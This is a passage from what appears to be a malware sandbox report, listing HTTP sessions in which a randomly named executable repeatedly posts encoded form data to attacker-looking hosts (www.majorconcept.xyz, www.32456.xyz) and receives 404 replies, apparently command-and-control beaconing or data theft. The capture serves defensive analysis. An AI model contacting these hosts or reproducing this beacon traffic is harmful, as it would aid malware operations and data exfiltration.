                                                                                              Oct 8, 2024 05:29:38.171873093 CEST534INData Raw: 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75
                                                                                              Data Ascii: px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}-
                                                                                              Oct 8, 2024 05:29:38.172923088 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.45003085.159.66.93805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:51.385139942 CEST684OUTPOST /pvqa/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.majorconcept.xyz
                                                                                              Origin: http://www.majorconcept.xyz
                                                                                              Referer: http://www.majorconcept.xyz/pvqa/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 63 4a 6d 5a 75 72 66 71 67 61 52 6c 50 46 55 45 53 59 2b 56 43 6f 71 58 4a 53 6f 35 43 44 30 4a 61 6e 42 2b 55 51 46 39 6d 63 45 67 50 4f 54 2b 50 62 64 52 57 41 38 78 63 30 77 4d 36 4d 56 43 73 61 52 35 68 59 65 63 73 43 4b 7a 6f 75 56 58 64 61 34 62 4d 4b 47 4f 34 34 46 4c 73 46 31 4c 74 74 5a 76 68 4a 46 4d 79 7a 4c 36 79 77 54 54 59 61 58 6c 38 41 61 45 30 51 30 31 67 76 55 4c 35 67 33 62 76 6c 51 72 73 55 45 44 30 50 54 2b 2f 45 57 74 36 77 31 79 58 74 48 65 46 51 69 71 56 72 30 6d 48 69 39 49 31 43 6e 48 4b 51 56 32 4a 6c 4c 6a 38 4f 4a 6a 44 6d 56 6d 71 4b 6e 37 32 51 3d 3d
                                                                                              Data Ascii: FJiPC=cJmZurfqgaRlPFUESY+VCoqXJSo5CD0JanB+UQF9mcEgPOT+PbdRWA8xc0wM6MVCsaR5hYecsCKzouVXda4bMKGO44FLsF1LttZvhJFMyzL6ywTTYaXl8AaE0Q01gvUL5g3bvlQrsUED0PT+/EWt6w1yXtHeFQiqVr0mHi9I1CnHKQV2JlLj8OJjDmVmqKn72Q==


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.45003185.159.66.93805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:53.931410074 CEST704OUTPOST /pvqa/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.majorconcept.xyz
                                                                                              Origin: http://www.majorconcept.xyz
                                                                                              Referer: http://www.majorconcept.xyz/pvqa/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 63 4a 6d 5a 75 72 66 71 67 61 52 6c 4d 6c 6b 45 58 2f 71 56 4f 59 71 57 47 79 6f 35 58 54 30 4e 61 6e 4e 2b 55 52 77 69 6d 76 67 67 4d 71 58 2b 4f 61 64 52 58 41 38 78 45 6b 77 4e 33 73 56 33 73 64 5a 78 68 5a 69 63 73 43 65 7a 6f 71 52 58 64 70 51 61 65 71 47 49 31 59 46 46 68 6c 31 4c 74 74 5a 76 68 4a 52 71 79 7a 6a 36 79 41 6a 54 5a 2b 6a 6d 69 51 61 48 38 77 30 31 7a 2f 55 50 35 67 32 2b 76 68 4a 38 73 52 59 44 30 4b 76 2b 2f 31 57 75 70 51 31 77 62 39 47 67 42 43 37 47 63 4b 39 70 48 78 42 57 6f 42 54 6e 47 32 45 73 59 55 71 30 75 4f 74 51 65 68 63 53 6e 4a 61 79 74 64 73 31 4c 39 7a 61 4c 54 4e 52 62 41 64 41 72 42 43 77 77 78 59 3d
                                                                                              Data Ascii: FJiPC=cJmZurfqgaRlMlkEX/qVOYqWGyo5XT0NanN+URwimvggMqX+OadRXA8xEkwN3sV3sdZxhZicsCezoqRXdpQaeqGI1YFFhl1LttZvhJRqyzj6yAjTZ+jmiQaH8w01z/UP5g2+vhJ8sRYD0Kv+/1WupQ1wb9GgBC7GcK9pHxBWoBTnG2EsYUq0uOtQehcSnJaytds1L9zaLTNRbAdArBCwwxY=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.45003285.159.66.93805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:56.477219105 CEST10786OUTPOST /pvqa/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.majorconcept.xyz
                                                                                              Origin: http://www.majorconcept.xyz
                                                                                              Referer: http://www.majorconcept.xyz/pvqa/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 63 4a 6d 5a 75 72 66 71 67 61 52 6c 4d 6c 6b 45 58 2f 71 56 4f 59 71 57 47 79 6f 35 58 54 30 4e 61 6e 4e 2b 55 52 77 69 6d 76 6f 67 4d 66 44 2b 50 35 31 52 51 41 38 78 61 30 77 49 33 73 56 51 73 62 78 31 68 5a 76 2b 73 45 53 7a 36 2f 46 58 62 59 51 61 55 71 47 49 38 34 46 49 73 46 30 44 74 74 49 6b 68 4a 42 71 79 7a 6a 36 79 43 4c 54 65 71 58 6d 6c 67 61 45 30 51 31 36 67 76 55 6e 35 6b 61 49 76 68 46 73 74 69 41 44 30 75 7a 2b 73 33 2b 75 7a 51 31 2b 59 39 47 6f 42 43 48 5a 63 4f 56 4c 48 77 31 77 6f 47 37 6e 57 51 35 49 63 30 57 67 34 4e 46 35 65 7a 78 31 67 6f 36 6b 6a 66 38 52 62 4a 58 50 57 43 31 69 63 58 6f 6e 7a 78 43 4f 76 48 62 57 36 71 33 67 69 33 35 55 59 63 34 50 4a 77 76 41 63 31 77 33 57 75 64 2b 55 64 5a 63 36 69 51 4b 52 35 79 2b 71 6c 62 71 74 61 2f 6f 63 75 38 6c 2f 63 49 4b 6f 76 57 5a 42 57 66 32 61 41 69 54 44 67 53 55 66 72 62 4b 41 71 4f 64 33 59 68 79 6b 76 32 4a 64 69 47 4a 58 53 4b 6d 44 35 50 74 5a 75 75 70 2f 76 43 56 36 45 75 46 79 76 32 43 49 57 57 77 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=cJmZurfqgaRlMlkEX/qVOYqWGyo5XT0NanN+URwimvogMfD+P51RQA8xa0wI3sVQsbx1hZv+sESz6/FXbYQaUqGI84FIsF0DttIkhJBqyzj6yCLTeqXmlgaE0Q16gvUn5kaIvhFstiAD0uz+s3+uzQ1+Y9GoBCHZcOVLHw1woG7nWQ5Ic0Wg4NF5ezx1go6kjf8RbJXPWC1icXonzxCOvHbW6q3gi35UYc4PJwvAc1w3Wud+UdZc6iQKR5y+qlbqta/ocu8l/cIKovWZBWf2aAiTDgSUfrbKAqOd3Yhykv2JdiGJXSKmD5PtZuup/vCV6EuFyv2CIWWwD4lU3y4LH4E/7QLhuTeDQedbu8Tyra1e0XdpA6Jlvd9brXe4tkgQJd+FcDRF+Pn3pCVENvobNnC53AOS8R8dqA5cO/0DwhxiM3i7qvUuWtm5lPbWoCq3y7u3N1Ks1GWvS+qgjcmEUTC5e3aqWLTv62grjuFQGmkrOFS2xR4XUmsLyEU0vmOW67ujtFav5WqbJprpXRB8QjI162C6RBVMiRJAd8viSKFojniOiaOh5OYQFoQG8R7ctgMUWN4ecS6/1MPxlrImcJLpTYmGJ06yWKscI2KuDi5LTzha9EJZERZAG2mq7wx8NMrDl2WUwfVn0gdBWnIDMIN6tIX7DcKEPzq4lCtJBrIPBePgGczaEj3XPJd+BKMyBxVzEpWrOrjw8XaCuGxvMzyc2YK2hYu9dWq4FWwQQyDJQCkhd/79eZCs8sBo07BATc57YyEfmJ0M+Ak6aOpDhCqV3NUlakaxheBBgrC243TdGFO9R4q/L5TFzhXMzDMnNAfWJ2esdm9/FBoDsShLWccYciUYy1El+y34L+XEx9tLwmOEmYtK1vh/sVmHlZNFEvVp2K3zBc+S8TlWX1MdNRgsLp98NI6Gw03EQPZUjgPzM26NT/lYq/+ofSpQoM2xphQTyB/J4hET8tFzOMc1VPDp0yF0xhfkJd/wSopj6OAsH2 [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.45003385.159.66.93805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:59.019268990 CEST408OUTGET /pvqa/?2FO=QBbT1R8&FJiPC=RLO5tcrCxJ5DbW4ZedTWBrzvBFkjbCggWXFTSCpZqt8FDcaILdRtdicCHXUrgshims5J8KWD1CKv/qFrWuRiVZ2kzqB7qEFPi/ItjJ1l7CTi/QfqH6jG1C0= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.majorconcept.xyz
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:29:59.705615044 CEST225INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.14.1
                                                                                              Date: Tue, 08 Oct 2024 03:29:59 GMT
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              X-Rate-Limit-Limit: 5s
                                                                                              X-Rate-Limit-Remaining: 19
                                                                                              X-Rate-Limit-Reset: 2024-10-08T03:30:04.5973648Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.450034185.121.178.197805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:05.515418053 CEST663OUTPOST /ucj8/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.32456.xyz
                                                                                              Origin: http://www.32456.xyz
                                                                                              Referer: http://www.32456.xyz/ucj8/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 79 4d 35 55 46 61 6a 76 55 75 57 37 6a 68 2b 76 51 45 74 6c 72 77 72 6b 43 78 68 72 4b 75 69 6b 2f 52 54 6d 50 73 67 43 4c 75 39 31 69 4a 48 34 49 55 4c 41 68 4e 5a 69 45 76 65 6b 35 50 35 38 46 47 43 41 72 4e 38 66 63 54 35 54 63 71 67 55 70 79 6e 32 43 31 67 33 4c 50 41 71 78 45 69 52 73 74 59 6e 4f 59 61 68 4a 75 51 41 30 6b 37 52 6b 31 73 73 39 62 7a 55 73 39 41 35 36 48 77 55 31 4a 4b 6b 43 46 2f 59 77 77 32 39 48 47 63 35 77 31 42 73 58 5a 55 4d 70 38 55 76 43 44 6f 4a 45 34 4f 2b 48 63 50 68 69 57 63 6a 38 37 2b 50 4a 43 5a 63 61 75 48 58 33 4c 61 68 46 62 6e 6e 72 67 3d 3d
                                                                                              Data Ascii: FJiPC=yM5UFajvUuW7jh+vQEtlrwrkCxhrKuik/RTmPsgCLu91iJH4IULAhNZiEvek5P58FGCArN8fcT5TcqgUpyn2C1g3LPAqxEiRstYnOYahJuQA0k7Rk1ss9bzUs9A56HwU1JKkCF/Yww29HGc5w1BsXZUMp8UvCDoJE4O+HcPhiWcj87+PJCZcauHX3LahFbnnrg==
                                                                                              Oct 8, 2024 05:30:06.494811058 CEST708INHTTP/1.1 404 Not Found
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Date: Tue, 08 Oct 2024 03:30:06 GMT
                                                                                              Server: nginx
                                                                                              X-Cache: BYPASS
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.450035185.121.178.197805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:08.058909893 CEST683OUTPOST /ucj8/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.32456.xyz
                                                                                              Origin: http://www.32456.xyz
                                                                                              Referer: http://www.32456.xyz/ucj8/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 79 4d 35 55 46 61 6a 76 55 75 57 37 69 43 6d 76 53 6d 46 6c 74 51 72 6e 62 42 68 72 42 4f 69 67 2f 52 66 6d 50 75 4e 66 4c 39 5a 31 6a 73 6a 34 4a 52 2f 41 6b 4e 5a 69 50 50 65 62 6d 2f 34 79 46 47 47 69 72 4d 77 66 63 54 74 54 63 71 77 55 6f 46 54 78 54 31 67 70 53 66 41 6f 2f 6b 69 52 73 74 59 6e 4f 59 66 45 4a 75 49 41 30 55 72 52 6b 55 73 74 6d 37 7a 62 34 74 41 35 78 6e 77 51 31 4a 4b 53 43 41 61 31 77 32 79 39 48 45 45 35 77 6e 70 72 41 70 56 48 30 73 56 67 43 6a 68 4e 4e 4a 6a 35 4d 61 44 59 71 43 4d 47 39 39 76 56 59 7a 34 4c 49 75 6a 6b 71 4d 54 56 49 59 61 75 77 67 6e 32 57 43 4a 43 44 33 73 41 51 38 41 61 62 74 73 35 46 6f 34 3d
                                                                                              Data Ascii: FJiPC=yM5UFajvUuW7iCmvSmFltQrnbBhrBOig/RfmPuNfL9Z1jsj4JR/AkNZiPPebm/4yFGGirMwfcTtTcqwUoFTxT1gpSfAo/kiRstYnOYfEJuIA0UrRkUstm7zb4tA5xnwQ1JKSCAa1w2y9HEE5wnprApVH0sVgCjhNNJj5MaDYqCMG99vVYz4LIujkqMTVIYauwgn2WCJCD3sAQ8Aabts5Fo4=
                                                                                              Oct 8, 2024 05:30:08.991693020 CEST708INHTTP/1.1 404 Not Found
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Date: Tue, 08 Oct 2024 03:30:08 GMT
                                                                                              Server: nginx
                                                                                              X-Cache: BYPASS
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.450036185.121.178.197805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:10.600647926 CEST10765OUTPOST /ucj8/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.32456.xyz
                                                                                              Origin: http://www.32456.xyz
                                                                                              Referer: http://www.32456.xyz/ucj8/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 79 4d 35 55 46 61 6a 76 55 75 57 37 69 43 6d 76 53 6d 46 6c 74 51 72 6e 62 42 68 72 42 4f 69 67 2f 52 66 6d 50 75 4e 66 4c 39 52 31 6a 66 62 34 49 79 58 41 6a 4e 5a 69 52 2f 65 65 6d 2f 35 75 46 47 2b 6d 72 4d 4d 70 63 56 70 54 61 34 49 55 67 55 54 78 61 31 67 70 50 50 41 70 78 45 6a 4c 73 72 34 6a 4f 59 76 45 4a 75 49 41 30 53 48 52 6d 46 73 74 68 4c 7a 55 73 39 41 31 36 48 77 6f 31 4a 53 73 43 42 62 49 78 46 36 39 4a 45 55 35 79 53 31 72 63 35 56 46 31 73 55 2f 43 6a 39 43 4e 4a 76 45 4d 61 66 2b 71 46 38 47 39 4c 79 66 4c 6e 49 44 63 65 76 64 38 4d 6e 70 48 65 4f 35 38 52 37 31 57 44 5a 48 52 57 6b 56 49 2f 70 34 65 4e 67 53 58 4e 46 69 30 65 6e 49 75 43 7a 65 43 6a 61 47 4e 35 63 44 66 39 34 42 33 64 4a 64 42 43 75 4e 68 73 73 42 49 6a 4d 36 33 49 42 67 58 6e 50 65 41 69 38 4d 79 39 6c 71 59 34 54 76 31 2b 43 70 5a 2b 66 4b 2b 41 36 54 4b 57 59 73 77 69 39 6e 68 4c 48 58 76 4c 57 41 6d 6b 69 66 63 62 36 4d 48 79 63 53 77 50 73 35 2f 4c 38 74 67 78 4a 6d 73 72 4b 63 6a 49 4e 44 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=yM5UFajvUuW7iCmvSmFltQrnbBhrBOig/RfmPuNfL9R1jfb4IyXAjNZiR/eem/5uFG+mrMMpcVpTa4IUgUTxa1gpPPApxEjLsr4jOYvEJuIA0SHRmFsthLzUs9A16Hwo1JSsCBbIxF69JEU5yS1rc5VF1sU/Cj9CNJvEMaf+qF8G9LyfLnIDcevd8MnpHeO58R71WDZHRWkVI/p4eNgSXNFi0enIuCzeCjaGN5cDf94B3dJdBCuNhssBIjM63IBgXnPeAi8My9lqY4Tv1+CpZ+fK+A6TKWYswi9nhLHXvLWAmkifcb6MHycSwPs5/L8tgxJmsrKcjINDwD0TnsmZyFotFYoWERPHB7CmsLTEvGlMv9IlpFANL+YBNgE70w/dEtdw1GWqpsYD3spTL7Q7Z7OacvsP/4pMQRJTtkcnaXu/YUZpXWRldzflu9gmvwCPM0r7g4BGHERXkHm1H1wVYiT6wPZTTXf341uCwNqG74+Unb5jf7WGxEAADE7R1F5ZaW/ApH1QKGN7Z42TexCYRF2F/Nup6LbkXrjla1N8aqTh5m4RZoBXeSykBVOmp1vmimwX+9Z6xKoue9AXTHTCKgreYiJNwG7pvJNsvWNTM4Jh8QCTp/4Ne4w2RZMVuuBOeHGmgY0uUJahBHBIgD3vy8j/tEn4fpX+MrEUp4WjTMWqdenLF4k3+wD1z85aq5TB0kvevSpfGba8t87IUgGkp/oMIcY1MKuVurHg6L4Ska7BrKMUbOJpFA6gFu30P0+62ALgy8vu0m5QKIj4hLTMd1+rcMvM5sI/Iq0ChvkLzijU6U72YoYkM6vxW1Iox1ivB1X9Nc01gGszhHyvMK0XsjCjxLZrLurd5EH1RPcdxY6uhgXhd14BMzfnCiQQB3DxEGeW7nZwWbxIdMuFhcI1brYgYVmDEEFplJsswrbAYISF1nFlAnX1yUBi467bGW60ghM8k1mfu903G+2Nqt9MWaF1PG82ewci4jSopMyupceuJK [TRUNCATED]
                                                                                              Oct 8, 2024 05:30:11.552409887 CEST708INHTTP/1.1 404 Not Found
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Date: Tue, 08 Oct 2024 03:30:11 GMT
                                                                                              Server: nginx
                                                                                              X-Cache: BYPASS
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.450037185.121.178.197805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:13.147437096 CEST401OUTGET /ucj8/?FJiPC=/OR0Gv3ARcC+oTiwVlgFvwfWLEZCPeymrzbXKOUlZ8hivfSIFELupuZNSeyona1zEh6C2fNDDz82Ku8poS/qbWUXFcIy31WMkdwjMbbyMeUh4DnqyXBk2Zk=&2FO=QBbT1R8 HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.32456.xyz
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:30:14.034758091 CEST708INHTTP/1.1 404 Not Found
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Date: Tue, 08 Oct 2024 03:30:13 GMT
                                                                                              Server: nginx
                                                                                              X-Cache: BYPASS
                                                                                              Connection: close
